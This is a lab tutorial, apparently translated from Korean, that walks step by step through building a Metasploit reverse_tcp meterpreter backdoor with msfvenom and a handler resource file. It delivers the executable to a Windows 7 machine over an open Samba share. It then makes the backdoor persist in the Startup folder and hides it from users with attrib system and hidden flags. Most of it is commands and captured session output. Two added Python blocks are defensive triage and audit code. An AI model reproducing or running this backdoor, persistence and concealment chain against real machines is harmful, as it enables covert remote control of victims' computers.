- Systems used
Kali Linux
Windows 7
- Building a system-intrusion lab with a resource (.rc) file
Attacker : Kali, public IP, handler program (listen)
Victim : Windows, private IP, malicious program (execute)
- Creating the backdoor
(kali)
# mkdir -p /root/bin
# cd /root/bin
# vi reverse_resource.rc
|
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.27.50
set ExitSession false
exploit -j -z
|
> The handler runs as a background job (-j) without interacting with the session (-z).
- Generating the attack code automatically from a payload
[Reference] msfvenom commands
# msfvenom
|
    -v, --var-name    <name>     Specify a custom variable name to use for certain output formats
    -p, --payload     <payload>  Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options        List the payload's standard options
    -l, --list        [type]     List a module type. Options are: payloads, encoders, nops, all
    -f, --format      <format>   Output format (use --help-formats for a list)
        --help-formats           List available formats
    -o, --out         <path>     Save the payload
|
# msfvenom -l ( # msfvenom -l | grep windows/x64/meterpreter )
|
windows/x64/meterpreter/bind_ipv6_tcp       Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection (Windows x64)
windows/x64/meterpreter/bind_ipv6_tcp_uuid  Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection with UUID Support (Windows x64)
windows/x64/meterpreter/bind_tcp            Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection (Windows x64)
windows/x64/meterpreter/bind_tcp_uuid       Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection with UUID Support (Windows x64)
windows/x64/meterpreter/reverse_http        Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 wininet)
windows/x64/meterpreter/reverse_https       Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 wininet)
windows/x64/meterpreter/reverse_tcp         Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64)
windows/x64/meterpreter/reverse_tcp_uuid    Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker with UUID Support (Windows x64)
windows/x64/meterpreter/reverse_winhttp     Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTP (Windows x64 winhttp)
windows/x64/meterpreter/reverse_winhttps    Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Tunnel communication over HTTPS (Windows x64 winhttp)
windows/x64/meterpreter_bind_tcp            Connect to victim and spawn a Meterpreter shell
windows/x64/meterpreter_reverse_http        Connect back to attacker and spawn a Meterpreter shell
windows/x64/meterpreter_reverse_https       Connect back to attacker and spawn a Meterpreter shell
windows/x64/meterpreter_reverse_ipv6_tcp    Connect back to attacker and spawn a Meterpreter shell
windows/x64/meterpreter_reverse_tcp         Connect back to attacker and spawn a Meterpreter shell
|
# msfvenom -p windows/x64/meterpreter/reverse_tcp --payload-options
|
Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port
|
# msfvenom --help-formats
|
Executable formats
    asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
    bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
|
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.27.50 -f exe > a.exe
> With options like these, an executable named a.exe is produced.
# msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.27.50 LPORT=4444 -f exe -o reverse_test.exe
|
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: reverse_test.exe
|
# ls reverse*
|
reverse_resource.rc  reverse_test.exe
|
# file reverse*
|
reverse_resource.rc: ASCII text
reverse_test.exe:    PE32+ executable (GUI) x86-64, for MS Windows
|
> The .exe file is a PE32+ (64-bit) Windows executable.
> When this file is run on Windows 7, it connects back to the Kali host that is listening.
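The `file` verdict above comes from a few header fields. As an added example (not code from the original post), here is a small Python parser that reads the DOS header, the COFF file header and the start of the optional header to report the same triage facts: PE32 vs PE32+, target machine, subsystem, and whether the image is a DLL. The sample image is constructed in `build_sample_pe` (header-only, not a runnable program), and all function names are my own.

```python
import struct
import sys

# IMAGE_FILE_MACHINE_* values from the PE/COFF specification.
MACHINE_NAMES = {0x014C: "Intel 80386", 0x8664: "x86-64", 0x01C4: "ARM Thumb-2", 0xAA64: "ARM64"}
# IMAGE_SUBSYSTEM_* values that matter for triage.
SUBSYSTEM_NAMES = {1: "native", 2: "GUI", 3: "console"}
IMAGE_FILE_DLL = 0x2000            # Characteristics bit: image is a DLL, not a program
OPTIONAL_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}


def describe_pe(data: bytes) -> dict:
    """Parse just enough of the DOS, COFF and optional headers to say what kind of PE this is."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ signature: not a DOS/PE image")
    # e_lfanew (offset 0x3C of the DOS header) points at the 'PE\0\0' signature.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    # COFF file header (20 bytes): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics.
    machine, n_sections, _, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if opt_size < 70 or opt + opt_size > len(data):
        raise ValueError("optional header missing or truncated")
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in OPTIONAL_MAGIC:
        raise ValueError(f"unknown optional header magic 0x{magic:04x}")
    # Subsystem sits at offset 68 of the optional header in both PE32 and PE32+.
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)
    return {
        "format": OPTIONAL_MAGIC[magic],
        "machine": MACHINE_NAMES.get(machine, f"unknown (0x{machine:04x})"),
        "subsystem": SUBSYSTEM_NAMES.get(subsystem, f"unknown ({subsystem})"),
        "dll": bool(characteristics & IMAGE_FILE_DLL),
        "sections": n_sections,
    }


def summarize(data: bytes) -> str:
    """One-line verdict in the style of file(1), e.g. 'PE32+ executable (GUI) x86-64'."""
    info = describe_pe(data)
    kind = "DLL" if info["dll"] else "executable"
    return f"{info['format']} {kind} ({info['subsystem']}) {info['machine']}"


def build_sample_pe(machine=0x8664, magic=0x20B, subsystem=2, characteristics=0x0022) -> bytes:
    """Constructed header-only image for offline testing; it is not a runnable program."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew: PE signature right after the DOS header
    opt_size = 240 if magic == 0x20B else 224      # standard optional header sizes for PE32+ / PE32
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Usage: python pe_triage.py [file.exe]; with no argument the constructed sample is described.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    print(summarize(blob))
```

Run against the msfvenom output on the page, the summary would read `PE32+ executable (GUI) x86-64`, matching `file`. A GUI-subsystem executable that never shows a window is itself a small triage signal: it is the combination that keeps a console from flashing when the file is launched.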
-> Moving the file to Windows 7
[Reference] Creating a shared folder
(kali)
# mkdir -p /share
# chmod 777 /share
# vi /etc/samba/smb.conf
|
.....(omitted).....
[share]
    comment = Kali Linux Shared Directory
    path = /share
    browseable = yes
    read only = no
    writable = yes
    public = yes
|
> Append this at the very bottom of the file.
# service smbd restart
# smbclient -L localhost -N
|
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.8-Debian]

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        share           Disk      Kali Linux Shared Directory
        IPC$            IPC       IPC Service (Samba 4.5.8-Debian)
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.5.8-Debian]

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
|
# cp reverse_test.exe /share
- Kali waits in the listen state
# msfconsole -r reverse_resource.rc
|
[msfconsole ASCII-art banner omitted]

       =[ metasploit v4.14.10-dev                         ]
+ -- --=[ 1639 exploits - 944 auxiliary - 289 post        ]
+ -- --=[ 472 payloads - 40 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing reverse_resource.rc for ERB directives.
resource (reverse_resource.rc)> use exploit/multi/handler
resource (reverse_resource.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (reverse_resource.rc)> set LHOST 192.168.27.50
LHOST => 192.168.27.50
resource (reverse_resource.rc)> set ExitSession false
ExitSession => false
resource (reverse_resource.rc)> exploit -j -z
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.27.50:4444
msf exploit(handler) > [*] Starting the payload handler...
msf exploit(handler) > sessions

Active sessions
===============

No active sessions.

msf exploit(handler) > jobs

Jobs
====

  Id  Name                    Payload                              Payload opts
  --  ----                    -------                              ------------
  0   Exploit: multi/handler  windows/x64/meterpreter/reverse_tcp  tcp://192.168.27.50:4444
|
> No session is connected yet, but one job is running in the background.
(win7)
\\192.168.27.50\share
Open the shared folder, copy reverse_test.exe to the desktop, and run it.
(kali)
|
msf exploit(handler) > [*] Sending stage (1189423 bytes) to 192.168.27.202
[*] Meterpreter session 1 opened (192.168.27.50:4444 -> 192.168.27.202:49165) at 2017-11-10 19:35:28 +0900

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                     Information                                     Connection
  --  ----                     -----------                                     ----------
  1   meterpreter x64/windows  adminstrator-PC\adminstrator @ ADMINSTRATOR-PC  192.168.27.50:4444 -> 192.168.27.202:49165 (192.168.27.202)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
Listing: C:\Users\adminstrator\Desktop
======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-10-10 18:08:24 +0900  desktop.ini
100777/rwxrwxrwx  7168  fil   2017-11-10 19:29:45 +0900  reverse_test.exe

meterpreter > sysinfo
Computer        : ADMINSTRATOR-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > cd ..
meterpreter > pwd
C:\Users\adminstrator
meterpreter > cd AppData/Roaming/Microsoft/Windows/"Start Menu"/Programs
meterpreter > pwd
C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
meterpreter > cd Startup
meterpreter > pwd
C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
meterpreter > upload reverse_test.exe
[*] uploading  : reverse_test.exe -> reverse_test.exe
[*] uploaded   : reverse_test.exe -> reverse_test.exe
meterpreter > reboot
Rebooting...
meterpreter > [*] 192.168.27.202 - Meterpreter session 1 closed.  Reason: Died
<enter>
msf exploit(handler) > quit
|
> This confirms that the connection was made.
> With sessions -i 1 you select and open the session, and from there you can do many things.
> Placing the file in C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
makes it run when Windows starts and the user logs in.
# msfconsole -r reverse_resource.rc
> Listening again: when the Win7 box that was rebooted earlier logs in, it reconnects.
|
msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                     Information                                     Connection
  --  ----                     -----------                                     ----------
  1   meterpreter x64/windows  adminstrator-PC\adminstrator @ ADMINSTRATOR-PC  192.168.27.50:4444 -> 192.168.27.202:49162 (192.168.27.202)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1184 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd "%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp"

C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>dir
[the code page 949 (Korean) listing was captured as mojibake and is omitted; the same listing follows after chcp 437]

C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>chcp
[Active code page: 949 (printed in Korean, captured as mojibake)]

C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>chcp 437
Active code page: 437

C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>dir
 Volume in drive C has no label.
 Volume Serial Number is 002C-5F51

 Directory of C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

2017-11-10  ?? 07:38    <DIR>          .
2017-11-10  ?? 07:38    <DIR>          ..
2017-11-10  ?? 07:38             7,168 reverse_test.exe
               1 File(s)          7,168 bytes
               2 Dir(s)  52,776,751,104 bytes free

C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>attrib /?
Displays or changes file attributes.

ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [+I | -I]
       [drive:][path][filename] [/S [/D] [/L]]

  +   Sets an attribute.
  -   Clears an attribute.
  R   Read-only file attribute.
  A   Archive file attribute.
  S   System file attribute.
  H   Hidden file attribute.
  I   Not content indexed file attribute.
  [drive:][path][filename]
      Specifies a file or files for attrib to process.
  /S  Processes matching files in the current folder
      and all subfolders.
  /D  Processes folders as well.
  /L  Work on the attributes of the Symbolic Link versus
      the target of the Symbolic Link

C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>attrib +h +r +s reverse_test.exe
|
> The shell command leaves meterpreter aside and uses the native commands of the connected operating system.
> On Windows, chcp 949 selects the Korean code page and chcp 437 the English one.
> The attrib command sets or clears attributes with +/-: R is read-only, S is system file, H is hidden file.
> Once the file is hidden as a system file, an ordinary user cannot see it.
(win7)
Start > type shell:startup and you are taken straight to the folder.
> The file is not visible.
[Reference]
<WINDOWS + R> > shell:startup : startup programs for the current user
-> Items here run for each user, at that user's own login
<WINDOWS + R> > shell:common startup : startup programs for all users
-> Items here run no matter which user logs in
(kali)
|
C:\Users\adminstrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>attrib -h -r -s reverse_test.exe
|
(win7)
> The file appears again.
>> In this way, a file placed in a folder that runs at login and given these attrib options goes unnoticed by an ordinary user.
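The attribute trick only hides the file from Explorer's default view; the bits are still on disk and a script can read them. As an added example (not part of the original post), here is a Python audit of the two Startup folders named above (shell:startup and shell:common startup) that reads the same attribute bits `attrib` sets and flags launchable files marked hidden or system. Folder paths assume the default profile locations, the sample listing is constructed to mirror the post's `dir` output after `attrib +h +r +s`, and the function names are my own.

```python
import os
import stat

# Windows file-attribute bits; Python's stat module exposes them on every platform.
HIDDEN = stat.FILE_ATTRIBUTE_HIDDEN      # attrib +h
SYSTEM = stat.FILE_ATTRIBUTE_SYSTEM      # attrib +s
READONLY = stat.FILE_ATTRIBUTE_READONLY  # attrib +r

# File types Explorer will launch from a Startup folder at logon.
LAUNCHABLE = {".exe", ".bat", ".cmd", ".com", ".scr", ".vbs", ".js", ".hta", ".ps1", ".lnk"}


def startup_folders():
    """Per-user (shell:startup) and all-users (shell:common startup) folders.
    Assumption: default %USERPROFILE% and %ProgramData% locations."""
    folders = []
    profile = os.environ.get("USERPROFILE")
    if profile:
        folders.append(os.path.join(profile, r"AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"))
    program_data = os.environ.get("ProgramData")
    if program_data:
        folders.append(os.path.join(program_data, r"Microsoft\Windows\Start Menu\Programs\StartUp"))
    return folders


def classify(name, attributes):
    """Describe one Startup-folder entry and decide whether it deserves a look."""
    _, ext = os.path.splitext(name.lower())
    flags = [label for bit, label in ((HIDDEN, "hidden"), (SYSTEM, "system"), (READONLY, "read-only"))
             if attributes & bit]
    launchable = ext in LAUNCHABLE
    # A launchable file marked hidden or system is exactly the pattern from the post:
    # it runs at logon but does not appear in Explorer or plain `dir`.
    suspicious = launchable and bool(attributes & (HIDDEN | SYSTEM))
    return {"name": name, "flags": flags, "launchable": launchable, "suspicious": suspicious}


def audit_listing(entries):
    """entries: iterable of (name, attribute_bits). Returns only the suspicious entries."""
    return [c for c in (classify(n, a) for n, a in entries) if c["suspicious"]]


def audit_folder(path):
    """Read real attributes with os.scandir; st_file_attributes exists only on Windows,
    so elsewhere every entry reads as attribute 0 and nothing is flagged."""
    entries = []
    with os.scandir(path) as it:
        for entry in it:
            attrs = getattr(entry.stat(follow_symlinks=False), "st_file_attributes", 0)
            entries.append((entry.name, attrs))
    return audit_listing(entries)


# Constructed listing mirroring the post's Startup folder after `attrib +h +r +s`.
SAMPLE_LISTING = [
    ("desktop.ini", HIDDEN | SYSTEM),                  # normal: hidden+system, but not launchable
    ("reverse_test.exe", HIDDEN | SYSTEM | READONLY),  # the hidden backdoor from the post
    ("Notes.lnk", stat.FILE_ATTRIBUTE_ARCHIVE),        # launchable but visible: not flagged
]

if __name__ == "__main__":
    for finding in audit_listing(SAMPLE_LISTING):
        print(f"[!] sample: {finding['name']} ({', '.join(finding['flags'])})")
    for folder in startup_folders():
        if os.path.isdir(folder):
            for finding in audit_folder(folder):
                print(f"[!] {folder}\\{finding['name']} ({', '.join(finding['flags'])})")
```

The same check from the cmd prompt used in the post is `dir /a` (list all entries, including hidden and system ones) or `attrib` with no arguments, which prints the attribute letters of every file in the current folder; both show the file that plain `dir` and Explorer omit.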
Summary)
Attacker ----------------> Victim
msfconsole                 shell/bind_tcp
Attacker <---------------- Victim
msfconsole (listen)        meterpreter/reverse_tcp